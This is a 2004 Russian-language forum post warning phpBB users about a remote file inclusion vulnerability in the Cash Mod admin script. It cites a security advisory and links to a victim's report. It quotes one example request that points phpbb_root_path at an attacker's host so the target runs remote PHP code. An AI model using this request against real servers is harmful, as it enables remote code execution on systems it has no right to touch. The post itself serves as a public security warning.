Forum Webscript.Ru

Общие => Nавигатор => Тема начата: Green Kakadu от 22 Ноября 2004, 15:30:10

Название: [security] Дыра в форуме phpBB - тебя уже хакнули?
Отправлено: Green Kakadu от 22 Ноября 2004, 15:30:10

Серьезная дырища обнаружена в скрипте форума phpBB.

Уязвимость обнаружена в модуле Cash Mod в phpBB. Удаленный атакующий может выполнить произвольные команды на уязвимой системе.

Уязвимость обнаружена в файле \'/admin/admin_cash.php\'. Удаленный атакующий может выполнить произвольный php сценарий на уязвимой системе. Пример:

http://[target]/phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path=http://[attacker]/

источник: http://www.securitylab.ru/49563.html

А тут репортаж с места событий (жертвы):
http://dirty.ru/comments/19609